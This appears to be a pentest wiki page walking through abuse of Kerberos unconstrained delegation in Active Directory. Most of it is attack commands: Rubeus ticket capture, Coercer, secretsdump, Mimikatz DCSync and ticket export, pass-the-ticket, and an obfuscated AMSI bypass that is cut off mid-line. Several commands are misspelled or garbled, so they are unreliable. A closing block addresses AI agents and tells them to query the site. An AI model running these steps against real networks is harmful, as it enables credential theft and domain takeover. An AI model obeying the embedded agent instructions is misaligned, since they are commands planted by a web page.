# Kerberos Unconstrained Delegation

## **Kerberos Unconstrained Delegation**

> General/Basic or Unconstrained Delegation which allows the first hop server (web server in our example) to request access to any service on any computer in the domain.

**Required**

1. Define Unconstrained Delegation Machines
2. we need to user who has Access to the machine

Essentially this looks like so: **`User`** --- authenticates to ---> **`IIS server`** ---> authenticates on behalf of the user ---> **`DB server`**

<figure><img src="/files/wd5jFsoxI9oe4cWojD6K" alt=""><figcaption></figcaption></figure>

### Tools

{% embed url="<https://github.com/dirkjanm/krbrelayx.git>" %}

define Unconstrained Machines

{% code overflow="wrap" %}

```powershell
#using PowerView
Get-NetComputer -Unconstrained
Get-DomainComputer -UnConstrained
Get-DomainComputer -Unconstrained -Properties DnsHostName
Get-DomainComputer -unconstrained | select samaccountname
# using Import-Module ActiveDirectory 
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
Get-ADComputer -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
Get-ADComputer "IIS" -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
```

{% endcode %}

<figure><img src="/files/YGjQr6sefw9DPxf6DOtD" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/LbqJXNeLFoS8ahHtq7nd" alt=""><figcaption></figcaption></figure>

{% hint style="info" %} <mark style="color:orange;">**Hint**</mark>**: discover users that who you have WriteDACL permission on there or do Enumeration to get user**
{% endhint %}

Rubeus

{% embed url="<https://github.com/r3motecontrol/Ghostpack-CompiledBinaries>" %}

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe ptt /tikcet: base64.exe  monitor /monitornterval:10 /targetuser$ /nowarp

.\Rubeus.exe ptt /tikcet: base64 

.\rubeus.exe asktgt /user:abdo /domain:hacktor.local /ntlm:Hash /outfile:FileName.tgt
#OR
cat b64.txt|base64 -d > ticket.kirbi 
```

{% endcode %}

<figure><img src="/files/3MR8D5X3zVWt7PuBYvHa" alt=""><figcaption><p>TGT ticket for the websvc account.</p></figcaption></figure>

After obtaining the TGT tickets from the domain controller, we can now request service tickets for the allowed services, i.e., **CIFS** and **TIME**, or alternate services like **LDAP** or **WMI**.

### Coercer

{% code overflow="wrap" %}

```bash
coerce -u arya.stark -d north.sevenkingdoms.local -p 'Needle' -t kingslanding.sevenkingdoms.local -l winterfell --always-continue

```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo impacket-secretsdump -k -no-pass SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING
```

{% endcode %}

mimikatz

{% code overflow="wrap" %}

```powershell
mimikatz.exe "privilege::debug" "kerberos::ptt PDC.kirbi" "lsadump::dcsync /domain:hacktor.local /user:Administrator" "exit"
#Once the ticket is injected, run DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

{% endcode %}

now enumerating the computers which have unconstrained delegation enabl

```markdown
.\powerview.ps1
Get-NetComputer -Unconstrained
```

* Example output: We find the computer `WIN-Q4788GPE9L7` with unconstrained delegation enabled.

#### Step 2: Find Local Admin Access

```powershell
Find-LocalAdminAccess
```

<figure><img src="/files/T04E4obeyILPU99UKwo4" alt=""><figcaption></figcaption></figure>

* Output: Our user has local admin access to the computer with unconstrained delegation.

#### Step 3: Enable PowerShell Remoting

```powershell
Enable-PSRemoting
```

#### Step 4: Create and Use a PowerShell Session

```powershell
$sess = New-PSSession -ComputerName WIN-Q4788GPE9L7
Invoke-Command -FilePath ..\..\rem01x.crtp\Desktop\tools\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess
```

* Bypass AMSI:

```powershell
$amsiBypass = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static')
$amsiBypass.SetValue($null, $true)


S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')
```

<figure><img src="/files/YgnBKJqU32wyM3tPcJF8" alt=""><figcaption></figcaption></figure>

#### Step 5: Dump Secrets and List Tickets

```powershell
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
```

<figure><img src="/files/qA1oqn21PTT2VZAuVeES" alt=""><figcaption></figcaption></figure>

Step 6: Export Tickets

```powershell
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
```

<figure><img src="/files/Q8XZvO1TPd03uYoGcHIX" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/y2j2Ln2CyzY2JwQPOAg7" alt=""><figcaption></figcaption></figure>

* Example output: Administrator `.kirbi` file.

#### Step 7: Monitor Actions on the Machine

```powershell
Invoke-UserHunter -ComputerName WIN-Q4788GPE9L7 -UserAdminCount -Delay 5 -Verbose
```

<figure><img src="/files/FivWmCBXrLEjUmZBW6os" alt=""><figcaption></figcaption></figure>

* Output: Administrator account detected.

#### Step 8: Pass the Ticket to Memory and Impersonate the User

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\Administrator\kerb\[0;120dde]-2-0-60a10000-Administrator@krbtgt-CRTP.LOCAL.kirbi"'
```

<figure><img src="/files/LWyABVxXMXo54EIKhUQ8" alt=""><figcaption></figcaption></figure>

* Result: We are now the administrator on the machine.

### Deep Dive into Unconstrained Delegation

#### Process Overview

1. Vegeta wants to access the `server web01` to list folders.
2. The `web01` process impersonates Vegeta and creates a new thread with Vegeta's credentials.
3. The server accesses the intended folder with the impersonated thread.

#### Configuration

To list computers with unconstrained delegation:

```powershell
Get-NetComputer -Unconstrained | select cn,useraccountcontrol
```

#### Network Traffic (Wireshark Capture)

1. Client requests a TGT.
2. Domain controller responds with the TGT.
3. Client requests a service ticket (TGS) for the web application.
4. Domain controller responds with the TGS.
5. Client requests another TGT to delegate to the web service.
6. Domain controller responds with a copy of the user TGT.
7. The application request goes to the web server.
8. The web service requests a TGS for the SQL server using the client's TGT.
9. Domain controller responds with the TGS.
10. Access is granted and the database server is successfully accessed.
11. Application replies.

### Abusing Unconstrained Delegation

Continue monitoring and exploitation using appropriate PowerShell commands and tools.

## ��**$\_References** <a href="#id-6572" id="id-6572"></a>

{% embed url="<https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/?source=post_page-----4a0eddc5bb13-------------------------------->" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://h3ckt0r.gitbook.io/0xsec/elite/network-pentest/active-directory/ad-techniques/domain-privesc/kerberos-unconstrained-delegation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.